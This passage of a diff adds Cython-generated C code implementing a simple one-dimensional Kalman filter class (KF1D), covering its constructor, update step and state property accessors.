*__pyx_t_2 = NULL; + double __pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "common/kalman/simple_kalman_impl.pyx":6 + * cdef class KF1D: + * def __init__(self, x0, A, C, K): + * self.x0_0 = x0[0][0] # <<<<<<<<<<<<<< + * self.x1_0 = x0[1][0] + * self.A0_0 = A[0][0] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_x0, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_t_1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 6, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_self->x0_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":7 + * def __init__(self, x0, A, C, K): + * self.x0_0 = x0[0][0] + * self.x1_0 = x0[1][0] # <<<<<<<<<<<<<< + * self.A0_0 = A[0][0] + * self.A0_1 = A[0][1] + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_x0, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 7, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->x1_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":8 + * self.x0_0 = x0[0][0] + * self.x1_0 = x0[1][0] + * self.A0_0 = A[0][0] # <<<<<<<<<<<<<< + * self.A0_1 = A[0][1] + * self.A1_0 = A[1][0] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_A, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_t_1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 8, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 8, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_self->A0_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":9 + * self.x1_0 = x0[1][0] + * self.A0_0 = A[0][0] + * self.A0_1 = A[0][1] # <<<<<<<<<<<<<< + * self.A1_0 = A[1][0] + * self.A1_1 = A[1][1] + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_A, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 9, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->A0_1 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":10 + * self.A0_0 = A[0][0] + * self.A0_1 = A[0][1] + * self.A1_0 = A[1][0] # <<<<<<<<<<<<<< + * self.A1_1 = A[1][1] + * self.C0_0 = C[0] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_A, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 10, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_t_1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 10, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 10, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_self->A1_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":11 + * self.A0_1 = A[0][1] + * self.A1_0 = A[1][0] + * self.A1_1 = A[1][1] # <<<<<<<<<<<<<< + * self.C0_0 = C[0] + * self.C0_1 = C[1] + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_A, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 11, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 11, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 11, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->A1_1 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":12 + * self.A1_0 = A[1][0] + * self.A1_1 = A[1][1] + * self.C0_0 = C[0] # <<<<<<<<<<<<<< + * self.C0_1 = C[1] + * self.K0_0 = K[0][0] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_C, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 12, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->C0_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":13 + * self.A1_1 = A[1][1] + * self.C0_0 = C[0] + * self.C0_1 = C[1] # <<<<<<<<<<<<<< + * self.K0_0 = K[0][0] + * self.K1_0 = K[1][0] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_C, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 13, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->C0_1 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":14 + * self.C0_0 = C[0] + * self.C0_1 = C[1] + * self.K0_0 = K[0][0] # <<<<<<<<<<<<<< + * self.K1_0 = K[1][0] + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_K, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_t_1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 14, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_self->K0_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":15 + * self.C0_1 = C[1] + * self.K0_0 = K[0][0] + * self.K1_0 = K[1][0] # <<<<<<<<<<<<<< + * + * self.A_K_0 = self.A0_0 - self.K0_0 * self.C0_0 + */ + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_K, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_t_2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 15, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->K1_0 = __pyx_t_3; + + /* "common/kalman/simple_kalman_impl.pyx":17 + * self.K1_0 = K[1][0] + * + * self.A_K_0 = self.A0_0 - self.K0_0 * self.C0_0 # <<<<<<<<<<<<<< + * self.A_K_1 = self.A0_1 - self.K0_0 * self.C0_1 + * self.A_K_2 = self.A1_0 - self.K1_0 * self.C0_0 + */ + __pyx_v_self->A_K_0 = (__pyx_v_self->A0_0 - (__pyx_v_self->K0_0 * __pyx_v_self->C0_0)); + + /* "common/kalman/simple_kalman_impl.pyx":18 + * + * self.A_K_0 = self.A0_0 - self.K0_0 * self.C0_0 + * self.A_K_1 = self.A0_1 - self.K0_0 * self.C0_1 # <<<<<<<<<<<<<< + * self.A_K_2 = self.A1_0 - self.K1_0 * self.C0_0 + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 + */ + __pyx_v_self->A_K_1 = (__pyx_v_self->A0_1 - (__pyx_v_self->K0_0 * __pyx_v_self->C0_1)); + + /* "common/kalman/simple_kalman_impl.pyx":19 + * self.A_K_0 = self.A0_0 - self.K0_0 * self.C0_0 + * self.A_K_1 = self.A0_1 - self.K0_0 * self.C0_1 + * self.A_K_2 = self.A1_0 - self.K1_0 * self.C0_0 # <<<<<<<<<<<<<< + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 + * + */ + __pyx_v_self->A_K_2 = (__pyx_v_self->A1_0 - (__pyx_v_self->K1_0 * __pyx_v_self->C0_0)); + + /* "common/kalman/simple_kalman_impl.pyx":20 + * self.A_K_1 = self.A0_1 - self.K0_0 * self.C0_1 + * self.A_K_2 = self.A1_0 - self.K1_0 * self.C0_0 + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 # <<<<<<<<<<<<<< + * + * def update(self, meas): + */ + __pyx_v_self->A_K_3 = (__pyx_v_self->A1_1 - (__pyx_v_self->K1_0 * __pyx_v_self->C0_1)); + + /* "common/kalman/simple_kalman_impl.pyx":5 + * + * cdef class KF1D: + * def __init__(self, x0, A, C, K): # <<<<<<<<<<<<<< + * self.x0_0 = x0[0][0] + * self.x1_0 = x0[1][0] + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pyx":22 + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 + * + * def update(self, meas): # <<<<<<<<<<<<<< + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_3update(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_6kalman_18simple_kalman_impl_4KF1D_3update = {"update", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_3update, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_3update(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_meas = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("update (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_meas,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_meas)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 22, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "update") < 0)) __PYX_ERR(0, 22, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_meas = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("update", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 22, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.update", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_2update(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), __pyx_v_meas); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_2update(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_meas) { + double __pyx_v_x0_0; + double __pyx_v_x1_0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + double __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("update", 0); + + /* "common/kalman/simple_kalman_impl.pyx":23 + * + * def update(self, meas): + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas # <<<<<<<<<<<<<< + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + * self.x0_0 = x0_0 + */ + __pyx_t_1 = PyFloat_FromDouble(((__pyx_v_self->A_K_0 * __pyx_v_self->x0_0) + (__pyx_v_self->A_K_1 * __pyx_v_self->x1_0))); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_self->K0_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_Multiply(__pyx_t_2, __pyx_v_meas); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_2); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 23, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_x0_0 = __pyx_t_4; + + /* "common/kalman/simple_kalman_impl.pyx":24 + * def update(self, meas): + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas # <<<<<<<<<<<<<< + * self.x0_0 = x0_0 + * self.x1_0 = x1_0 + */ + __pyx_t_2 = PyFloat_FromDouble(((__pyx_v_self->A_K_2 * __pyx_v_self->x0_0) + (__pyx_v_self->A_K_3 * __pyx_v_self->x1_0))); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_self->K1_0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_v_meas); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_3); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 24, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_x1_0 = __pyx_t_4; + + /* "common/kalman/simple_kalman_impl.pyx":25 + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + * self.x0_0 = x0_0 # <<<<<<<<<<<<<< + * self.x1_0 = x1_0 + * + */ + __pyx_v_self->x0_0 = __pyx_v_x0_0; + + /* "common/kalman/simple_kalman_impl.pyx":26 + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + * self.x0_0 = x0_0 + * self.x1_0 = x1_0 # <<<<<<<<<<<<<< + * + * return [self.x0_0, self.x1_0] + */ + __pyx_v_self->x1_0 = __pyx_v_x1_0; + + /* "common/kalman/simple_kalman_impl.pyx":28 + * self.x1_0 = x1_0 + * + * return [self.x0_0, self.x1_0] # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_self->x0_0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->x1_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyList_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_2, 1, __pyx_t_1); + __pyx_t_3 = 0; + __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "common/kalman/simple_kalman_impl.pyx":22 + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 + * + * def update(self, meas): # <<<<<<<<<<<<<< + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.update", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pyx":30 + * return [self.x0_0, self.x1_0] + * + * @property # <<<<<<<<<<<<<< + * def x(self): + * return [[self.x0_0], [self.x1_0]] + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1x_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1x_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_1x___get__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_1x___get__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "common/kalman/simple_kalman_impl.pyx":32 + * @property + * def x(self): + * return [[self.x0_0], [self.x1_0]] # <<<<<<<<<<<<<< + * + * @x.setter + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->x0_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->x1_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 32, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_t_3); + __pyx_t_2 = 0; + __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/kalman/simple_kalman_impl.pyx":30 + * return [self.x0_0, self.x1_0] + * + * @property # <<<<<<<<<<<<<< + * def x(self): + * return [[self.x0_0], [self.x1_0]] + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.kalman.simple_kalman_impl.KF1D.x.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/kalman/simple_kalman_impl.pyx":34 + * return [[self.x0_0], [self.x1_0]] + * + * @x.setter # <<<<<<<<<<<<<< + * def x(self, x): + * self.x0_0 = x[0][0] + */ + +/* Python wrapper */ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1x_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_x); /*proto*/ +static int __pyx_pw_6common_6kalman_18simple_kalman_impl_4KF1D_1x_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_x) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_1x_2__set__(((struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *)__pyx_v_self), ((PyObject *)__pyx_v_x)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_6kalman_18simple_kalman_impl_4KF1D_1x_2__set__(struct __pyx_obj_6common_6kalman_18simple_kalman_impl_KF1D *__pyx_v_self, PyObject *__pyx_v_x) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + double __pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + + /* "common/kalman/simple_kalman_impl.pyx":36 + * @x.setter + * def x(self, x): + * self.x0_0 = x[0][0] # <<<<<<<<<<<<<< + * 